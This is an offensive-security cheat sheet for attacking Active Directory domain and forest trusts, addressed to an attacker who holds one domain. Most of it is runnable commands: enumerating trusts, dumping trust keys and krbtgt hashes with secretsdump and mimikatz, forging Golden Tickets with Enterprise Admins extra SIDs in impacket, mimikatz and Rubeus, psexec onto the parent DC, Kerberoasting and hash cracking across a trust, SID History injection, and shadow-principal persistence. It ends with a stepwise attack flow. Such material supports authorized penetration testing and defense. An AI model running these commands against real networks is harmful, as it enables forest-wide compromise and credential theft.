Domain and Forest Trust Attacks
Trust enumeration, cross-domain attacks, SID history abuse, trust key extraction, inter-forest Kerberoasting, PAM trust abuse, and foreign group membership exploitation.
Sections Domain and Forest Trust Attacks
You have compromised one domain and want to pivot to another through trust relationships. Trusts define how authentication flows between domains and forests. Parent-child trusts within a forest are bidirectional and transitive by default, giving you a direct path to the forest root.
Trust Fundamentals
| Trust Type | Direction | Transitivity | Scope | Attack Path |
|---|---|---|---|---|
| Parent-Child | Bidirectional | Transitive | Intra-forest | SID History, Golden Ticket with extra SIDs |
| Tree-Root | Bidirectional | Transitive | Intra-forest | Same as parent-child |
| Forest (External) | One-way or Bidirectional | Non-transitive | Inter-forest | Limited by SID filtering |
| Shortcut | Bidirectional | Transitive | Intra-forest | Same as parent-child |
| Realm (MIT) | One-way or Bidirectional | Non-transitive | Kerberos realm | Trust key abuse |
Within a forest, all domains trust each other implicitly. Compromising any domain in the forest gives you a path to the forest root through the parent-child trust. SID filtering is not enforced on intra-forest trusts, so SID History injection works.
Trust Enumeration
Remote (Linux)
terminal
# NetExec - enumerate trusts
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M enum_trusts
# ldapsearch - trust objects
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
-b "CN=System,DC=corp,DC=local" "(objectClass=trustedDomain)" cn trustDirection trustType trustAttributes flatName
# Impacket - enumerate trusts
root@localhost:~# impacket-lookupsid corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 -domain-sids
# rpcclient
root@localhost:~# rpcclient -U 'corp.local/svc_backup%P@ssw0rd123' 10.10.11.35 -c "enumtrust"
root@localhost:~# rpcclient -U 'corp.local/svc_backup%P@ssw0rd123' 10.10.11.35 -c "dsr_enumtrustdom"Windows
powershell
# AD Module
PS C:\> Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType, IntraForest, SIDFilteringForestAware, TGTDelegation
# PowerView
PS C:\> Get-DomainTrust
PS C:\> Get-DomainTrust -Domain child.corp.local
PS C:\> Get-ForestTrust
PS C:\> Get-ForestDomain
# nltest
PS C:\> nltest /domain_trusts /all_trusts /v
# .NET
PS C:\> ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
PS C:\> ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()Trust Direction Reference
terminal
# trustDirection values in LDAP
# 0 = Disabled
# 1 = Inbound (they trust us - their users can access our resources)
# 2 = Outbound (we trust them - our users can access their resources)
# 3 = Bidirectional
# trustType values
# 1 = Windows NT (legacy)
# 2 = Active Directory
# 3 = MIT Kerberos realm
# trustAttributes flags
# 0x00000001 = Non-Transitive
# 0x00000002 = Uplevel Only (Windows 2000+)
# 0x00000004 = SID Filtering Quarantined
# 0x00000008 = Forest Trust
# 0x00000020 = Intra-Forest
# 0x00000040 = Forest TransitiveForeign Group Membership and Users
Identify users from one domain that have been added to groups in another domain. These are direct cross-domain access paths.
powershell
# PowerView - find foreign group members (users from other domains in our groups)
PS C:\> Get-DomainForeignGroupMember | Select-Object GroupDomain, GroupName, MemberDomain, MemberName
# Find foreign users (users from other domains with access to our domain)
PS C:\> Get-DomainForeignUser | Select-Object UserDomain, UserName, GroupDomain, GroupName
# Find users from child.corp.local in corp.local groups
PS C:\> Get-DomainGroupMember -Domain corp.local | Where-Object {$_.MemberDomain -ne "corp.local"} | Select-Object GroupName, MemberName, MemberDomainterminal
# ldapsearch - find foreign principals in groups
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
-b "DC=corp,DC=local" "(&(objectClass=foreignSecurityPrincipal))" cn
# BloodHound CE - foreign membership edges
MATCH p=(u)-[:MemberOf]->(g) WHERE u.domain <> g.domain RETURN pParent-Child Trust Escalation (Intra-Forest)
Within a forest, parent-child trusts do not enforce SID filtering. If you compromise a child domain, you can forge a Golden Ticket with the Enterprise Admins SID in the extra SIDs field and escalate to the forest root.
Extract the Trust Key
The trust key is the shared secret between the two domains. You can also use the child domain’s krbtgt hash.
# DCSync the trust account (the trust account name is the parent domain with a $ suffix)
impacket-secretsdump child.corp.local/Administrator:'P@ssw0rd123'@10.10.11.36 -just-dc-user 'corp.local$'
# Or DCSync the krbtgt of the child domain
impacket-secretsdump child.corp.local/Administrator:'P@ssw0rd123'@10.10.11.36 -just-dc-user krbtgt
# Mimikatz - dump trust keys
PS C:\> .\mimikatz.exe "lsadump::trust /patch" "exit"
# Mimikatz - DCSync the trust account
PS C:\> .\mimikatz.exe "lsadump::dcsync /domain:child.corp.local /user:corp$" "exit"Forge a Golden Ticket with Extra SIDs
# Get the parent domain SID
impacket-lookupsid corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 0
# Parent SID: S-1-5-21-3842939050-3880317879-2865463114
# Enterprise Admins RID: 519
# Forge the ticket with extra SIDs using the child krbtgt hash
impacket-ticketer -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
-domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
-domain child.corp.local \
-extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 \
Administrator
export KRB5CCNAME=Administrator.ccache
# Access the parent domain DC
impacket-psexec corp.local/Administrator@dc01.corp.local -k -no-pass
impacket-secretsdump corp.local/Administrator@dc01.corp.local -k -no-pass -just-dc
# Mimikatz - Golden Ticket with extra SIDs
PS C:\> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:child.corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt" "exit"
# Rubeus
PS C:\> .\Rubeus.exe golden /user:Administrator /domain:child.corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /pttThe
/sids parameter adds the Enterprise Admins SID (RID 519) of the parent domain to the ticket’s extra SIDs field. Because SID filtering is not enforced on intra-forest trusts, the parent DC will honor this SID and grant Enterprise Admin privileges.Using the Trust Key Instead of krbtgt
terminal
# Inter-realm TGT using the trust key
root@localhost:~# impacket-ticketer -nthash <trust_key_hash> \
-domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
-domain child.corp.local \
-extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 \
-spn krbtgt/corp.local \
Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-psexec corp.local/Administrator@dc01.corp.local -k -no-passInter-Forest Attacks
Forest trusts enforce SID filtering, which strips non-native SIDs from tickets crossing the trust boundary. This blocks the extra SIDs technique. However, there are still attack paths.
Inter-Forest Kerberoasting
If a forest trust exists, authenticated users in one forest can request TGS tickets for SPNs in the trusted forest.
terminal
# Enumerate SPNs in the trusted forest
root@localhost:~# impacket-GetUserSPNs -target-domain partner.com corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35
# Request and crack TGS hashes from the trusted forest
root@localhost:~# impacket-GetUserSPNs -target-domain partner.com corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -request -outputfile partner_kerb.txt
root@localhost:~# hashcat -m 13100 partner_kerb.txt /usr/share/wordlists/rockyou.txtpowershell
# Rubeus - Kerberoast across trust
PS C:\> .\Rubeus.exe kerberoast /domain:partner.com /dc:dc01.partner.com /outfile:C:\Temp\partner_kerb.txtForeign Group Membership Abuse
If users from your domain are members of groups in the trusted forest, you can use those users to access resources in the other forest.
powershell
# Find our users in the trusted forest's groups
PS C:\> Get-DomainForeignGroupMember -Domain partner.com
# If svc_backup@corp.local is in "IT Admins" in partner.com:
PS C:\> Enter-PSSession -ComputerName srv01.partner.com -Credential (Get-Credential)TGT Delegation Abuse
Some forest trusts have TGT Delegation enabled, which allows unconstrained delegation across the trust boundary.
powershell
# Check if TGT Delegation is enabled on the trust
PS C:\> Get-ADTrust -Filter * | Select-Object Name, TGTDelegation
# If TGTDelegation is True, unconstrained delegation attacks work across the trust
# Coerce authentication from the other forest and capture TGTsSID History Across Trusts
Intra-Forest (No SID Filtering)
Within a forest, SID History is honored across trusts. Inject the Enterprise Admins SID of the root domain into a user in a child domain.
terminal
# bloodyAD - inject SID History
root@localhost:~# bloodyAD -d child.corp.local -u Administrator -p 'P@ssw0rd123' --host 10.10.11.36 add SIDHistory svc_backup 'S-1-5-21-3842939050-3880317879-2865463114-519'Inter-Forest (SID Filtering Active)
SID filtering on forest trusts strips SIDs that do not belong to the trusted domain. Direct SID History injection will not work. However, SID filtering does not strip SIDs that match the trusted domain’s SID, so you can still use SID History for accounts within the same forest scope.
Microsoft introduced “SID filtering relaxation” (also called “quarantine”) as a trust attribute. Some organizations disable quarantine for migration purposes. Check the
trustAttributes value, specifically the 0x00000004 (QUARANTINED_DOMAIN) flag. If this flag is not set, SID filtering may be relaxed.PAM Trust Abuse
Privileged Access Management (PAM) trusts are a special trust type introduced with Windows Server 2016 bastion forests. The bastion forest grants temporary group memberships using time-based (shadow) security principals.
powershell
# Enumerate PAM trusts
PS C:\> Get-ADTrust -Filter {TrustAttributes -band 0x400} | Select-Object Name, TrustAttributes
# Enumerate shadow security principals in the bastion forest
PS C:\> Get-ADObject -SearchBase "CN=Shadow Principal Configuration,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -Filter * -Properties * | Select-Object Name, member, msDS-ShadowPrincipalSidIf you compromise the bastion forest, you can create shadow principals that map to high-privilege groups in the production forest. Shadow principals with no expiry effectively give permanent access disguised as temporary PAM access.
Trust Attack Flow
1
Enumerate All Trusts
“Map every trust relationship from the compromised domain. Get the trust direction, type, transitivity, and SID filtering status for each trust.”
2
Intra-Forest: Escalate to Forest Root
“If you are in a child domain, extract the krbtgt hash and forge a Golden Ticket with the Enterprise Admins SID in extra SIDs. SID filtering is not enforced within a forest.”
3
Inter-Forest: Kerberoast Across the Trust
“Enumerate SPNs in the trusted forest and Kerberoast them. Crack the hashes to get plaintext passwords for accounts in the other forest.”
4
Check Foreign Memberships
“Look for users from your domain in groups in the trusted forest (and vice versa). These provide direct access paths.”
5
Check TGT Delegation
“If TGT Delegation is enabled on the trust, unconstrained delegation attacks work across the boundary. Coerce authentication and capture TGTs.”